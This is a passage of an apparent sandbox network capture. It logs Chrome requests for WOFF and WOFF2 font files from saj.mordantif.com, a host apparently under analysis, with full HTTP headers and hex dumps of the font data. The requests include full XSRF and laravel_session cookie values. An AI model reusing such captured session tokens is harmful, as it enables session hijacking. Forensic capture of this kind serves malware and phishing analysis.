                                                        2024-09-13 13:07:06 UTC1369INData Raw: d5 c0 5d 18 50 87 c9 64 24 c2 03 28 ac 50 96 bb ef f8 1e 3c 28 7c 24 bc f6 92 80 47 fa cf 6c 9c 21 68 97 ad 5d b7 f4 2f ec 5f 77 ff 34 c9 7e 80 a9 b7 bf c0 ef cc ed 7b 44 f8 b2 bd ae ae 4d 78 98 cc b3 e4 d1 db 5c 3a d0 38 89 e8 df b0 50 15 cf 61 16 24 07 cb 32 cd 40 e4 00 51 7c 28 fa 37 2a 22 38 d0 d3 1d 25 e1 24 5e 11 20 11 ac 99 62 10 13 67 c9 2c 04 e9 1a 20 0a 5b 15 a1 23 19 7d 66 da c0 4b 7b 9a 7c 47 dc 32 2b ba b2 57 ae 78 7f 14 bd 3f 75 e5 33 ed 4f 7e 91 fd 45 74 5f 75 75 ef fb c2 fb b3 b6 bc e4 9f 37 70 64 81 6d 5a 47 51 64 73 49 7f cf c0 b9 4b 73 0f f4 e4 1c 7f b8 70 76 55 fd f4 fe ee be 33 17 9a 1e 1e 28 00 7c fd 81 76 bb a9 1d 15 6a 0b 22 04 a2 3a d8 9b e8 04 51 be d2 09 88 41 be 13 6d 85 df 15 66 70 2b 84 19 02 f7 e4 67 9f dd 6d 83 fa 0f 41 7f
                                                        Data Ascii: ]Pd$(P<(|$Gl!h]/_w4~{DMx\:8Pa$2@Q|(7*"8%$^ bg, [#}fK{|G2+Wx?u3O~Et_uu7pdmZGQdsIKspvU3(|vj":QAmfp+gmA
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 71 81 5a 94 91 4d 4a 08 0f 03 db c2 c7 5d 85 d2 70 9a c3 c8 aa a2 8d 93 28 3e 95 5a 45 fe 3b 50 6b d7 92 2d d1 31 ee 01 1e f7 fd 6c 1b 51 87 4b ea eb 87 6c 21 42 79 43 c0 d4 a8 cc 34 85 6a 30 de 96 9e 0c 5c fd 20 68 c8 d6 71 1a f2 85 27 6e 36 04 64 45 65 36 a5 c8 54 24 fc da 02 f3 0d a4 20 f2 45 91 28 cb 66 06 9e 52 63 06 ac 77 62 1a 49 f2 56 e3 10 c0 f0 d3 12 cb 30 24 48 1b e9 17 a9 05 db d3 8d 58 e0 8e 3e b8 d6 68 31 63 c5 0f 27 83 fe d3 f1 be f8 92 25 63 de 38 ee 13 1e 72 f4 c8 99 c5 97 ec 3f 12 bd 72 61 f7 25 61 c3 ff 0f f0 03 ed c7 df 47 7d c1 40 82 9f 1b f0 21 08 78 ce 1d bc 51 90 65 2a de 5d 25 79 a5 6a 4c f5 55 60 80 de 5f e7 27 69 2b ad af a7 3a 1c 3c 18 bd c1 62 d6 9b f5 46 d1 45 25 28 ea 40 6b 5e 22 ae ea e0 20 71 56 e1 2f d3 6f 7f 90 df f9 e9
                                                        Data Ascii: qZMJ]p(>ZE;Pk-1lQKl!ByC4j0\ hq'n6dEe6T$ E(fRcwbIV0$HX>h1c'%c8r?ra%aG}@!xQe*]%yjLU`_'i+:<bFE%(@k^" qV/o


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        45192.168.2.549782172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:05 UTC1391OUTGET /56RePLZ7UZmHT23036MEuv60 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Origin: https://saj.mordantif.com
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:06 UTC619INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:06 GMT
                                                        Content-Type: font/woff2
                                                        Content-Length: 28584
                                                        Connection: close
                                                        Content-Disposition: inline; filename="56RePLZ7UZmHT23036MEuv60"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pqWqNB8plpNfdanzMdrrVzRqOs2ppNSPP1kMf5UqwE18iuO1yr08INVSieVFoSZxQPBYt%2FC0rXW3UFpaHzNt5PwCuVcJ1ahrtyoQb9irFwGiTXzr%2BTMDCko%2BuaA1HQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bb7dd7543c1-EWR
                                                        2024-09-13 13:07:06 UTC750INData Raw: 77 4f 46 32 00 01 00 00 00 00 6f a8 00 10 00 00 00 01 36 78 00 00 6f 47 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 bc 3e 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 c0 68 82 a2 42 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 27 07 97 7b 0c 81 0d 5b 78 22 71 04 dd b6 5d c4 a2 0a ca 1b ec 97 68 4a b7 df b3 0a d8 b1 27 dc 0e e2 ce 96 b5 c5 0a 36 ae 32 bb 5b 95 0a ec 05 71 f6 ff ff 7f 7a d2 88 b1 6d 43 77 77 ff 00 08 2a a9 65 55 b0 0a 53 9a a2 10 14 ad 17 8a 9a 11 30 8d c1 53 1a 73 a6 e1 b6 2c ad b0 c2 e4 5c e5 65 96 de 46 b1 26 ef 94 d7 16 8d 6f 55 2a 52 1a 7d 51 f7 43 8e e7 32 b9 54 44 c8 b6 e1 0a d3 35 11 09 23 e7 fa 68 14 48 a4 32 ac 7c 3c e8 31 a3 7a a7 a2 5d cf 78 5a f4 95 0f 7a 9d f0 7a b2 e4 97 57 f8 13 be d9
                                                        Data Ascii: wOF2o6xoGB>`<<bhB6$x> '{[x"q]hJ'62[qzmCww*eUS0Ss,\eF&oU*R}QC2TD5#hH2|<1z]xZzzW
                                                        2024-09-13 13:07:06 UTC1369INData Raw: f7 d3 db e4 35 29 e5 97 60 00 e0 77 26 a7 ec 8c 51 bd 04 a5 aa 2d c9 13 20 11 06 0d 39 e4 58 74 9e 2f 53 51 3f 14 73 2b 75 0c 39 ee 1f 5c b1 68 d4 6c b0 47 cb 23 fc 2a a7 d5 23 40 83 46 d2 88 c9 66 c5 31 84 66 01 9d 3d 60 1f f0 e3 f1 70 ca 0b 01 a0 c2 94 3d 63 f0 be d9 92 66 3d 9c eb 70 20 34 42 79 0e 75 ff 7a 27 cb 0f ee 24 3b 04 73 b6 a4 dd 16 db 7a d0 f6 e3 e3 12 58 be c5 6e 36 79 2d e0 06 b4 05 18 a1 7f b4 fd cf 8a 12 3c cd 09 17 b1 bb 1d be 58 9e 81 7f 85 04 cd 7e 2b 6a 8a 7a bb 6a b2 f8 ff ee f7 db c0 37 f0 50 44 93 b8 4f 10 d5 77 d1 fa 39 9d 90 38 5d 13 21 7e 43 26 98 18 b4 cd d0 fb 13 2a 4c 43 45 d3 dc 4e 66 7e af 4e 9f 65 4a fa 69 58 6e 58 2a 43 81 26 e6 f5 bf 8b 74 b6 55 83 fc 4e 72 d2 40 91 b6 6c 5a b0 80 a7 03 20 d9 8f 58 b9 a2 c8 93 7a cd 73
                                                        Data Ascii: 5)`w&Q- 9Xt/SQ?s+u9\hlG#*#@Ff1f=`p=cf=p 4Byuz'$;szXn6y-<X~+jzj7PDOw98]!~C&*LCENf~NeJiXnX*C&tUNr@lZ Xzs
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 44 eb 95 0e 88 ec 30 d0 66 50 36 51 17 59 8c ca 45 0b 23 fa 81 55 bc 59 5f 55 fe a0 40 a1 20 35 57 9b d4 3c b9 b3 29 ed a7 16 d3 13 45 0b c5 4c 25 f1 30 23 97 d9 4e bd 28 ab 1d d0 c2 14 6f c9 61 f9 56 40 1e 2b aa 69 29 e1 5a 15 f9 c1 0e 10 e8 40 d0 3a 0c 29 8c a9 39 12 e8 b0 01 e8 f6 ee 52 ab d2 f0 06 94 a4 e3 89 30 00 08 57 44 ed a2 83 bc a0 e0 07 54 5b 4d 54 db a3 29 51 e2 43 bf 56 c9 5a 96 e8 1f 92 c0 20 b0 78 90 51 a2 3c 19 06 e5 c4 18 b4 51 95 16 6c ec cd a6 0b e6 b6 d1 db 00 56 0c 1e a0 cb a0 80 03 02 ba eb e2 92 60 fa 62 ea 87 59 4d 58 29 3a 30 36 0c 02 ce fb 12 0a 67 57 cf 6d 7c f0 81 96 93 88 02 ba ef 92 55 dd 8c f9 fa 69 f2 71 0c 59 37 73 08 39 5d ce e5 85 bb 59 16 bd 18 b4 30 75 01 f3 09 a6 26 0f af 55 73 55 f9 8b 2d cb f9 49 0a 03 cd 24 bd 7e
                                                        Data Ascii: D0fP6QYE#UY_U@ 5W<)EL%0#N(oaV@+i)Z@:)9R0WDT[MT)QCVZ xQ<QlV`bYMX):06gWm|UiqY7s9]Y0u&UsU-I$~
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 8c 82 bb fa 9b 75 db a1 66 75 c9 75 d3 64 f1 8c aa ea bf de f8 8f 20 f3 86 3a ba e8 43 54 6a 8a 28 69 af 3c e6 ea b6 b2 5d 1b f8 18 09 92 64 e8 bd 0a 1d e0 d3 ba bc 10 cc cb 06 57 5c 77 bd a9 1a 44 81 23 b1 00 73 e8 10 9d bc f0 cc 39 be 92 1c 86 29 96 14 29 84 bf f5 e6 98 7e 7c d5 7f bf fc c3 77 d3 3c 9d cf ff 57 80 cf 97 9a d9 60 5e bd 00 ef d9 ff 57 bb 7c 10 17 61 91 5f e2 e0 bf 67 17 38 6d 72 f7 c0 87 b9 c7 2b b1 0e 4b b1 bd 52 1c c4 78 e7 87 af ff f6 09 93 1e 60 d4 16 c7 bd 7b 90 2e ac c4 27 6b 93 0d 57 9e 7c 28 0f 5c f9 c6 1c d3 b8 97 5b 0f 28 3e 06 4b ae 4a 42 c2 63 6d 65 b3 87 f4 02 73 e9 ec 31 94 dd 4d 35 43 9e 82 ef 1a 19 ca 1a de 11 5a 06 1e 1c 66 50 e3 92 33 b2 78 9f 06 fa de d0 77 b9 e5 f7 d4 e5 a7 d9 89 be 67 54 d4 43 9f 16 46 78 01 9d 5a 25
                                                        Data Ascii: ufuud :CTj(i<]dW\wD#s9))~|w<W`^W|a_g8mr+KRx`{.'kW|(\[(>KJBcmes1M5CZfP3xwgTCFxZ%
                                                        2024-09-13 13:07:06 UTC1369INData Raw: ca 6d 2a c2 93 2c 7c e1 4f 0a f5 78 68 ed f3 95 63 92 85 c2 64 da 80 92 57 22 90 60 5c e2 76 78 80 a3 e7 17 e6 65 84 d8 68 fc 45 39 36 9d b6 bd 10 a7 d5 3c 40 98 a4 95 3d 2f 5c b2 3e 4f 05 c0 c6 03 43 4f 91 c1 b6 2a 1c ab 73 0f 48 30 21 8e 1a d3 24 e5 69 1b 45 37 55 e3 c4 1b 70 81 70 c6 8e c3 c7 15 fd d0 6a 42 d4 1a 9b 2c 71 78 1c 68 90 8e 66 52 12 59 39 ec 05 60 4b 10 46 0a d3 3b 4f 93 e9 9c 42 34 fe 5a 4c 23 c9 da 61 da ca b0 2e 42 bf ba 4e 43 ee 7b a5 b6 cd 10 a9 9e d6 76 c2 da 8c 75 0b 16 88 a2 6a f6 21 ff 46 59 15 b1 d8 a4 ae 93 c7 8f 9e 79 f0 b8 5e 0d 87 be b3 43 8a 3b 87 21 5b ce a4 5d 92 b7 f9 a1 38 f5 96 d0 8b c3 0e d8 3d be 24 30 f0 11 92 c4 5c c9 d4 f5 38 62 51 c4 09 ab 9c ee 74 c2 1d 9d 3f 80 6f 2b ee d5 47 d6 5b 60 91 6e 70 0d bf 4e 8d bc 0a
                                                        Data Ascii: m*,|OxhcdW"`\vxehE96<@=/\>OCO*sH0!$iE7UppjB,qxhfRY9`KF;OB4ZL#a.BNC{vuj!FYy^C;![]8=$0\8bQt?o+G[`npN
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 44 bf ef c7 df 5e 30 2e a5 1f cd 43 40 1e 70 cc f3 0a 36 82 72 f9 89 38 79 b0 a5 24 70 54 fe 74 60 c5 01 22 5e b9 e6 19 a1 43 02 57 17 2b 13 89 c3 3d af 86 3d 5b 59 ec d0 9d 86 23 f9 67 f1 fb 3a 58 07 48 c6 63 87 75 a2 a8 0c 94 5b bc 1e 8e 82 53 19 0c 24 da 49 3c 17 4c 27 29 d9 9d 80 57 5a ab 4f 76 b1 d5 d5 66 d6 cd 0b 43 de c4 07 9d fb 6a 3d 35 5d 05 18 4d fc cf f3 d5 52 8a 37 07 16 7b c0 bd 19 bc 8f 5b ba 06 00 c5 83 23 de f6 d2 01 41 b8 02 01 50 23 69 24 5c 1c ef 34 bf 27 04 01 13 5c 88 a0 4a 93 f8 12 79 bb a9 68 e7 2f 4d 81 05 1e 94 a0 46 8b ee 74 70 0e c0 c0 06 bf 4a a1 4d 9b de 6d 3c 06 38 10 40 08 15 1a b4 ec f1 81 bb 5f 18 f6 cc 77 10 ea 8d 43 df 85 0f fd 36 f8 e2 04 f8 bf 37 77 9c 81 9f e8 12 4f 3f 5c fa 4a 33 6a 34 14 cd b7 3d 06 0f be ed b1 78
                                                        Data Ascii: D^0.C@p6r8y$pTt`"^CW+==[Y#g:XHcu[S$I<L')WZOvfCj=5]MR7{[#AP#i$\4'\Jyh/MFtpJMm<8@_wC67wO?\J3j4=x
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 1b ab 7b 8a be a9 a2 c5 b8 43 ea 57 b3 bc 10 37 82 25 84 7d 6c eb e6 e6 16 e5 cc a2 be 5d 7f 9c 81 78 43 89 26 d3 24 7b 66 a6 e7 a6 78 6a 9a 55 d3 3d 36 c3 13 cb bc b7 a6 03 56 fb 2f cd 7d 12 13 c0 38 5c 55 a0 e1 24 e3 29 0d 8d ab 57 ae 5a f3 da 99 73 6a ff 83 13 79 f9 de ad a4 cd b6 da 6b 75 de 3c 4e 5d ab ad 29 8e bd e8 f4 90 28 0f 5f 6c f3 f3 71 f4 b1 c7 9f 78 f2 a9 a7 9f e1 41 ca f5 83 8e 3b ef 36 73 5a b5 d9 a6 5d 87 4e 5d ba f5 da 6e 87 9d 76 d9 6d 8f bd fa ed 33 f0 8a 1f 7c f0 73 cd 61 47 f8 86 14 f4 d9 05 4a 43 a1 a2 d7 e1 81 fb 1e 7a e2 b1 e7 3e fb e6 2b 1b 30 fb 13 00 f8 c0 06 e0 02 9b 00 1e f7 07 3f 94 ea cb 9c fd 8a 07 b7 5f 72 79 43 e1 99 99 f9 af 64 20 e2 d5 4f f8 1a 9f 0f 45 87 ab 6f b8 e5 b6 3b 6e 6a 3e 07 38 ea e2 92 3d 6f 53 e8 7a d5 90
                                                        Data Ascii: {CW7%}l]xC&${fxjU=6V/}8\U$)WZsjyku<N])(_lqxA;6sZ]N]nvm3|saGJCz>+0?_ryCd OEo;nj>8=oSz
                                                        2024-09-13 13:07:06 UTC1369INData Raw: a9 57 67 f7 51 bd 61 37 69 bc 69 4b 76 78 bf 58 39 1e 64 1d 8e 2d 52 6f f1 43 6b ea a6 58 f8 13 68 45 70 b2 db 5a 4d d1 66 ac 0c bc b8 74 db ad f6 4c df 84 10 7c 9b 9c ea 48 0d 9c 0e 4c d5 de a5 81 a8 4e 91 7e be 3d c8 de d1 df a1 59 98 3a 2d 47 0e ae f9 33 c0 16 17 db ed 6f c8 04 34 b3 31 0a 82 b1 49 41 13 32 21 98 26 40 6b 46 10 cc 4d d0 02 82 65 02 75 ad 08 82 b5 09 da 40 b0 4d 80 d2 8e 20 d8 9b a0 03 04 c7 04 5a 3a 11 04 67 13 74 81 e0 9a 40 43 37 82 e0 6e 82 1e 90 ef 09 85 af e3 7e 79 b3 a8 3c 1f af a3 ea b7 59 3a 65 d4 f0 e9 2e 26 f6 67 88 bf 3c 17 fe 4a 7d 86 6f b3 d4 df 1f 89 7f d8 c2 3f 29 f0 6b 96 fb f7 23 f1 1f 5b f8 2f 05 29 b5 c1 3b 3f f9 d3 9d 6f 74 4d 92 6e c1 9b 60 e7 5b 3f ce 93 de be b6 0e 52 ab 33 bf 5e c8 c7 d5 43 95 3d 57 f1 64 9a 6e
                                                        Data Ascii: WgQa7iiKvxX9d-RoCkXhEpZMftL|HLN~=Y:-G3o41IA2!&@kFMeu@M Z:gt@C7n~y<Y:e.&g<J}o?)k#[/);?otMn`[?R3^C=Wdn
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 19 1b 9a 4e 20 d9 ad ef 8f d4 83 74 ce bb a7 2e 77 88 ac c3 8d 0f b2 51 bb 08 c0 b8 d9 ad 54 c6 3f f5 45 b6 35 f7 cb 1c cb 38 c1 a2 9a 9b bb 68 e1 2e a8 d4 0d b2 c4 ad c9 e2 ab a1 8d df 65 cf 1b 09 af e5 6d 50 2f b2 bc d5 91 41 8b 0c 3c 2c db 32 2a a4 e0 28 ad 42 06 2b ca c1 98 40 6d ea 72 b4 be d5 41 a6 7d 2b 6b 37 24 85 3a 61 fd 7c 04 75 c4 5f a6 e5 5d 66 a6 df a4 f5 e8 28 89 3d ab 0b 0c 6c b4 d2 a8 77 7e 3e 40 5f 74 8d 57 30 00 c5 e8 bd 8c fd d4 dc ad 43 5d 93 64 52 3e 47 47 5e f4 3b 0c 17 af f2 bd 11 03 7d e5 8b 1d 0d ae ad 1d c8 4c ce ae 60 97 20 5d 60 73 e9 4d 28 9e fa 17 4a 14 06 9a f3 51 58 d3 87 f7 f0 6a a7 e7 02 f1 7c a6 6b c0 5a 9c a6 71 a7 6d 77 5c a5 e4 ea 23 ea 5a 6c 9c d5 7a 09 7f 9a b1 87 11 03 90 28 34 e5 6a cc db 32 a1 cc 92 41 35 e7 6c
                                                        Data Ascii: N t.wQT?E58h.emP/A<,2*(B+@mrA}+k7$:a|u_]f(=lw~>@_tW0C]dR>GG^;}L` ]`sM(JQXj|kZqmw\#Zlz(4j2A5l
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 41 c0 80 54 b8 1b 3b bc 73 32 24 3c dc a9 94 c8 fd c4 62 cb 69 1a e0 6f 82 ae 79 55 71 5b e8 20 f7 e1 10 fc 2e 89 29 19 ad 45 f6 10 16 12 7c 7b a9 ae e7 89 03 39 7c 32 4f 25 b8 b1 a6 79 4b 84 ec 81 38 13 20 4f dd db 92 0a 82 ab 02 5f f7 76 1d b5 70 ff 5a 4b 61 e9 9a f0 b4 c9 a7 65 19 99 eb d2 ff cc 5a 1d d5 ad 3d a9 dc d7 3f d7 04 87 47 ae d8 83 2a ec 4b 7a 32 cf 40 de 17 24 b5 27 3d fc 70 e1 7d f8 26 a9 fd b4 70 3c ba 84 97 64 67 4b 73 47 73 22 75 e1 a6 a3 95 79 c9 7d 3a f9 6e a4 ea 9e bf 47 78 1c db ef 7d 70 0e 4a d9 66 b0 6f fb 0a db de d6 5b 5f a7 6d 6d aa e6 3b 4c 81 04 ba 0d be 91 ce 1f e7 b8 cc ce 72 36 ce 9f f8 4b 3e f6 63 d0 39 da 99 e1 24 58 ef ad ce 1d 15 87 68 95 9d 29 d7 2d 75 09 b7 74 bd 2b 99 86 a9 ef 3b 52 06 06 93 98 67 80 17 a1 24 df 05
                                                        Data Ascii: AT;s2$<bioyUq[ .)E|{9|2O%yK8 O_vpZKaeZ=?G*Kz2@$'=p}&p<dgKsGs"uy}:nGx}pJfo[_mm;Lr6K>c9$Xh)-ut+;Rg$


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        46192.168.2.549780172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:05 UTC1395OUTGET /45itnDnlBkLf89wB5guMvj2hxy65 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Origin: https://saj.mordantif.com
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:06 UTC620INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:06 GMT
                                                        Content-Type: font/woff
                                                        Content-Length: 36696
                                                        Connection: close
                                                        Content-Disposition: inline; filename="45itnDnlBkLf89wB5guMvj2hxy65"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s6G5IBC7Xlo8OSL1%2B29zSLwtVHjOfAWHKlA3dl8TUf1FHHwqU%2FCadXKnJ9E7RYh16IcxRdnZDmFADGv3uEKyRGn37Pb7epT0BzUhLZ3lHd7MN156GfHSAO0e5Mt9TA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bb81fbc8cc8-EWR
                                                        2024-09-13 13:07:06 UTC749INData Raw: 77 4f 46 46 00 01 00 00 00 00 8f 58 00 11 00 00 00 01 36 90 00 01 00 00 00 00 8e 30 00 00 01 28 00 00 02 97 00 00 00 00 00 00 00 00 44 53 49 47 00 00 8e 28 00 00 00 08 00 00 00 08 00 00 00 01 47 50 4f 53 00 00 01 80 00 00 18 99 00 00 5e 3e 80 e1 18 da 47 53 55 42 00 00 1a 1c 00 00 02 ad 00 00 04 96 8c 33 79 b9 4f 53 2f 32 00 00 1c cc 00 00 00 46 00 00 00 60 68 60 7b 5a 63 6d 61 70 00 00 1d 14 00 00 05 1a 00 00 07 3c 97 3f 2b 12 63 76 74 20 00 00 87 b0 00 00 00 30 00 00 00 3c 28 d6 01 ad 66 70 67 6d 00 00 87 e0 00 00 05 c1 00 00 0b e2 3f ae 1b 9f 67 61 73 70 00 00 87 a8 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 22 30 00 00 54 6c 00 00 a0 68 11 94 2e 2b 68 65 61 64 00 00 76 9c 00 00 00 34 00 00 00 36 1a bb 7d da 68 68 65 61 00 00 76 d0 00 00 00
                                                        Data Ascii: wOFFX60(DSIG(GPOS^>GSUB3yOS/2F`h`{Zcmap<?+cvt 0<(fpgm?gaspglyf"0Tlh.+headv46}hheav
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 20 67 2a 4d a7 b7 68 2e cd a3 c5 b4 94 96 51 21 7d 42 c5 b4 9a d6 51 09 6d a4 4d b4 85 b6 52 1d 35 2a bf 4a 55 69 2a a8 f2 55 5f 35 40 5d ae ae 50 57 aa 81 ea 2a 35 48 0d 56 57 ab 6b d4 b5 ea 3a 35 44 5d af 6e 50 23 d4 18 35 56 3d a9 c6 a9 a7 d4 78 f5 b4 9a a0 9e 57 2f a8 89 ea 45 35 49 bd 04 8a 4e 56 53 d4 54 d0 75 ba 9a a1 5e 55 33 d5 5f d4 1b ea 6d 35 47 2d 50 8b d5 12 55 a8 8a d4 47 6a 95 2a 56 ab d5 a7 6a 8d 5a ab d6 a9 f5 6a a3 da 42 4a bd ca 5f 50 77 ca e3 30 f5 e2 66 2a 00 8f 96 71 13 95 f0 71 35 96 f7 aa 27 b9 46 3d 4d 49 6a 02 37 a8 e7 91 5e e0 66 f5 22 87 d5 4b 5c a1 a6 70 48 4d 43 de 74 a4 57 b9 5a cd 42 7a 9d eb d5 6c 94 2b c6 b3 b5 d4 85 ce 01 65 7c a0 8d 0f b5 1e a5 42 3e 8e 9a 0f a9 31 a8 61 2c f5 44 ed 45 6a 1c e5 a8 a7 28 a8 c6 93 4f 3d
                                                        Data Ascii: g*Mh.Q!}BQmMR5*JUi*U_5@]PW*5HVWk:5D]nP#5V=xW/E5INVSTu^U3_m5G-PUGj*VjZjBJ_Pw0f*qq5'F=MIj7^f"K\pHMCtWZBzl+e|B>1a,DEj(O=
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 00 2d 3a 4f d6 e1 0d 70 0b f4 8a e0 9c a5 69 07 3a 1f c1 db c9 f0 f2 79 f0 13 cb e0 fb fc c6 27 ed b7 bd 3d ac 5d 21 b0 b3 ad 2e f0 04 b6 61 ad 5b 68 b9 10 b6 63 0c 3c e1 58 d8 86 27 79 35 f4 ca 6f ac ef 26 d1 a5 c9 90 86 a9 90 f9 69 22 b5 b0 ba d0 e2 57 91 3f 13 16 73 16 f2 6d 3b a2 71 98 0b 1d 50 b6 05 84 34 c3 fa 42 92 0b d0 aa e6 6b 37 48 d4 71 d4 7f 5c fc e1 04 d0 60 32 d2 62 78 80 25 48 ef 23 2d 43 fa 00 e9 23 3c d7 5a b0 1a e9 53 d4 8f 5e 2b 44 95 6a 23 d2 56 cd 69 60 9a 05 8c 2c 48 45 12 da 1b 83 de 2a b5 1c 12 aa 5c 49 a8 43 cf ab 5d 39 3a 6c ee 2c 91 23 94 c2 73 4d 5d 0b 3c b2 0c 7d d2 9d a7 f0 54 bd 78 ab a3 2d 42 73 e5 bc c7 db 28 69 e8 49 1d e1 0e 9b 78 fb 40 7a 88 ee 43 9c 7c 14 3c 48 e2 30 b0 b0 50 3e 85 9b 00 90 39 66 ae e7 1a 5c eb d4 44
                                                        Data Ascii: -:Opi:y'=]!.a[hc<X'y5o&i"W?sm;qP4Bk7Hq\`2bx%H#-C#<ZS^+Dj#Vi`,HE*\IC]9:l,#sM]<}Tx-Bs(iIx@zC|<H0P>9f\D
